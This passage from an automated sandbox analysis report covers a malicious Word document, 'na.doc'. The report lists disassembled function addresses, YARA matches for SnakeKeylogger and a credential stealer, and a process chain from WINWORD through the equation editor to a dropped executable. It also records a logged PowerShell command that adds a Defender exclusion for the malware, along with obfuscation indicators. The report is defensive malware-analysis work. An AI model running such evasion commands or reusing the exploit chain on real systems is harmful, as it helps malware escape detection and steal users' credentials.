                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FC0207_2_006FC020
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F39207_2_006F3920
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F7A3E7_2_006F7A3E
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F60387_2_006F6038
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FDA307_2_006FDA30
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F6D307_2_006F6D30
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FF7307_2_006FF730
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F9D087_2_006F9D08
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FB3087_2_006FB308
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F00067_2_006F0006
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F90007_2_006F9000
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F461A7_2_006F461A
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FB3187_2_006FB318
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FEE107_2_006FEE10
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F39107_2_006F3910
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FC0107_2_006FC010
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F68E87_2_006F68E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F5BE07_2_006F5BE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FE4E07_2_006FE4E0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F82F87_2_006F82F8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F75F07_2_006F75F0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F8FF07_2_006F8FF0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FBBC87_2_006FBBC8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F34C87_2_006F34C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F4EC87_2_006F4EC8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FC8C17_2_006FC8C1
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FAEC07_2_006FAEC0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F41C07_2_006F41C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F68DA7_2_006F68DA
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F4ED87_2_006F4ED8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FD5D87_2_006FD5D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FFBD87_2_006FFBD8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F5BD27_2_006F5BD2
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FC8D07_2_006FC8D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F41D07_2_006F41D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FF2A87_2_006FF2A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F8BA87_2_006F8BA8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F98A17_2_006F98A1
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F7EA07_2_006F7EA0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F34B97_2_006F34B9
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FBBB87_2_006FBBB8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F98B07_2_006F98B0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FAEB07_2_006FAEB0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F57887_2_006F5788
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FDE887_2_006FDE88
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F71887_2_006F7188
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FD1807_2_006FD180
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F4A807_2_006F4A80
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F64807_2_006F6480
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F7E9E7_2_006F7E9E
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F71987_2_006F7198
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F8B987_2_006F8B98
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F64907_2_006F6490
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00762E787_2_00762E78
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007635587_2_00763558
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007600407_2_00760040
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00763C387_2_00763C38
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007643187_2_00764318
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007649F87_2_007649F8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007650D87_2_007650D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007657B87_2_007657B8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00762E687_2_00762E68
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_0076354A7_2_0076354A
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007621307_2_00762130
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007621217_2_00762121
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00763C287_2_00763C28
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00762B007_2_00762B00
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007643087_2_00764308
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00762AF27_2_00762AF2
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007649E97_2_007649E9
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00760ED87_2_00760ED8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007650C87_2_007650C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_007657A87_2_007657A8
                  Source: na.doc, type: SAMPLE; Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack, type: UNPACKEDPE; Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: cdlpohayugo39567.exe PID: 3424, type: MEMORYSTR; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: cdlpohayugo39567.exe PID: 3512, type: MEMORYSTR; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: qHbynE8Vgwabsy3[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: cdlpohayugo39567.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, pbVHJsCgecSXhXNesj.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, pbVHJsCgecSXhXNesj.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, pbVHJsCgecSXhXNesj.cs Security API names: _0020.AddAccessRule
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, pbVHJsCgecSXhXNesj.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, pbVHJsCgecSXhXNesj.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, pbVHJsCgecSXhXNesj.cs Security API names: _0020.AddAccessRule
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, nkQiD6cY1Ydm4FTjxb.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, nkQiD6cY1Ydm4FTjxb.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, pbVHJsCgecSXhXNesj.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, pbVHJsCgecSXhXNesj.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, pbVHJsCgecSXhXNesj.cs Security API names: _0020.AddAccessRule
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, nkQiD6cY1Ydm4FTjxb.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winDOC@9/14@28/9
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$na.doc
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Mutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC927.tmp
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: na.doc ReversingLabs: Detection: 44%
                  Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Process created: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll, wow64cpu.dll, msi.dll, cryptsp.dll, rpcrtremote.dll, dwmapi.dll, version.dll, secur32.dll, winhttp.dll, webio.dll, iphlpapi.dll, winnsi.dll, dnsapi.dll, nlaapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Section loaded: wow64win.dll, wow64cpu.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, bcrypt.dll, cryptsp.dll, windowscodecs.dll, amsi.dll, rpcrtremote.dll, propsys.dll, apphelp.dll, ntmarta.dll, secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll, wow64cpu.dll, atl.dll, mscoree.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, amsi.dll, msisip.dll, secur32.dll, rpcrtremote.dll, ncrypt.dll, bcrypt.dll, gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Section loaded: wow64win.dll, wow64cpu.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, bcrypt.dll, cryptsp.dll, rasapi32.dll, rasman.dll, rtutils.dll, winhttp.dll, webio.dll, credssp.dll, iphlpapi.dll, winnsi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, rpcrtremote.dll, dnsapi.dll, rasadhlp.dll, secur32.dll, ncrypt.dll, gpapi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll, wow64cpu.dll, msi.dll, cryptsp.dll, rpcrtremote.dll, dwmapi.dll
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                  Source: na.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\na.doc
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                  Source: na.doc Static file information: File size 1838683 > 1048576
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: Binary string: vqar.pdb source: EQNEDT32.EXE, 00000002.00000003.403025619.000000000063D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.403029344.0000000000621000.00000004.00000020.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000005.00000000.402963037.0000000000E82000.00000020.00000001.01000000.00000004.sdmp, qHbynE8Vgwabsy3[1].exe.2.dr, cdlpohayugo39567.exe.2.dr
                  Source: Binary string: vqar.pdbSHA256 source: EQNEDT32.EXE, 00000002.00000003.403025619.000000000063D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.403029344.0000000000621000.00000004.00000020.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000005.00000000.402963037.0000000000E82000.00000020.00000001.01000000.00000004.sdmp, qHbynE8Vgwabsy3[1].exe.2.dr, cdlpohayugo39567.exe.2.dr

                  Data Obfuscation

                  Source: 5.2.cdlpohayugo39567.exe.337ac68.4.raw.unpack, Uo.cs .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.cdlpohayugo39567.exe.3391e88.3.raw.unpack, Uo.cs .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, pbVHJsCgecSXhXNesj.cs .Net Code: edtX4RO75J System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.cdlpohayugo39567.exe.bc0000.0.raw.unpack, Uo.cs .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, pbVHJsCgecSXhXNesj.cs .Net Code: edtX4RO75J System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, pbVHJsCgecSXhXNesj.cs .Net Code: edtX4RO75J System.Reflection.Assembly.Load(byte[])
                  Source: qHbynE8Vgwabsy3[1].exe.2.dr Static PE information: 0xA3006032 [Mon Aug 28 17:53:54 2056 UTC]
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005E4456 push ecx; ret 2_2_005E4457
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005D8F52 push eax; retf 2_2_005D8F61
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005E444E push ecx; ret 2_2_005E444F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005E6B4E push eax; ret 2_2_005E6B4F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005E5A7A push ecx; ret 2_2_005E5A7B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005E5672 push ecx; ret 2_2_005E5673
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005E5A72 push ecx; ret 2_2_005E5A73
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005E0F60 push eax; retn 005Dh 2_2_005E0F61
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005E54DB push ecx; ret 2_2_005E54DF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005D01F4 push eax; retf 2_2_005D01F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005E54E3 push ecx; ret 2_2_005E54E7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005E6B94 push eax; ret 2_2_005E6B97
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005E6B8C push eax; ret 2_2_005E6B8F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005E6B85 push eax; ret 2_2_005E6B87
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005E54B7 push ecx; ret 2_2_005E54D7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005E6BA4 push eax; ret 2_2_005E6C6F
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Code function: 7_2_0015D410 push edi; retf 0015h 7_2_0015D411
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Code function: 7_2_006B9590 pushfd ; retn 0065h 7_2_006B9591
                  Source: qHbynE8Vgwabsy3[1].exe.2.dr Static PE information: section name: .text entropy: 7.712698415610093
                  Source: cdlpohayugo39567.exe.2.dr Static PE information: section name: .text entropy: 7.712698415610093
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, DOkRkfKla7d2nWXn0d.cs, High entropy of concatenated method names: 'MX2WcoApX9', 'awIWU8e2WY', 'gVqWDNG3Ig', 'wrjWffJHyv', 'lyZW2X3M1C', 'EfHWEHZ9mx', 'tbSWAxdv9c', 'VEVWg1wARx', 'WvjW8XOxXW', 'MteWrEOUlL'
